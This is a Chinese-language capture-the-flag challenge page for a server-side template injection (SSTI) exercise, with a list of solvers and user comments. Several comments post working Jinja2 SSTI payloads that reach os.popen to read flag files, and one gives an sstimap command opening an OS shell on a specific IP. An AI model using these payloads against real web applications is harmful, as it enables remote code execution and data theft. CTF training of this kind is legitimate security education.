Simple_SSTI_2WEB 未解决
分数:
10
金币:
3
题目作者:
valecalida
一 血:
Tokeii
一血奖励:
3金币
解 决:
16562
提 示:
描 述:
Simple_SSTI_2
评分(15)
解题动态
Sylvia 攻破了该题 11小时前
windliu 攻破了该题 2天前
一介村妇 攻破了该题 2天前
Kur0Ai1uro. 攻破了该题 2天前
luobosir 攻破了该题 4天前
MOTMlsc 攻破了该题 4天前
暗流安全 攻破了该题 5天前
dwx386572657 攻破了该题 5天前
15079182261 攻破了该题 6天前
zxx256xxz 攻破了该题 7天前
yxrw 攻破了该题 9天前
天天1 攻破了该题 10天前
Aa313010 攻破了该题 11天前
lvchijing 攻破了该题 13天前
KING12366 攻破了该题 16天前
星落. 攻破了该题 16天前
Dlacking 攻破了该题 17天前
薄言. 攻破了该题 21天前
Zfc 攻破了该题 21天前
评论
suxiansheng 1月前
举报
详解参考https://mp.csdn.net/mp_blog/creation/editor/161513397
pipizhu 1月前
举报
?flag={{lipsum.__globals__['os'].popen('cat /app/flag').read()}}获取flag
bugku2026 3月前
举报
先通过?flag={{self.__dict__}}发现拥有lipsum,再通过?flag={{lipsum.__globals__.os.popen("cat /app/flag").read()}}获取flag
r1ng_13 3月前
举报
焚靖直接秒,比上一个SSTI还简单
网恋秀牛子被录屏导致自卑 6月前
举报
/?flag={{(OvO.__eq__.__globals__.sys.modules.os.popen('cat flag')).read()}}
liutong27 10月前
举报
python3 sstimap.py -u http://117.72.52.127:12369/?flag=1 --os-shell
wywitkey 1年前
举报
前面说的都对,这道题在ssti里比较简单,推荐使用sstimap,可以一把梭,直接出os-shell
HK1ng 1年前
举报
详解:https://blog.csdn.net/m0_59527104/article/details/147013776
smtall 1年前
举报
flag={{ self.__init__.__globals__.__builtins__.__import__('os').popen('cat flag').read() }}
hao7 1年前
举报
?flag={%for(x)in().__class__.__base__.__subclasses__()%}{%if'war'in(x).__name__ %}{{x()._module.__builtins__['__import__']('os').popen('cat flag').read()}}{%endif%}{%endfor%}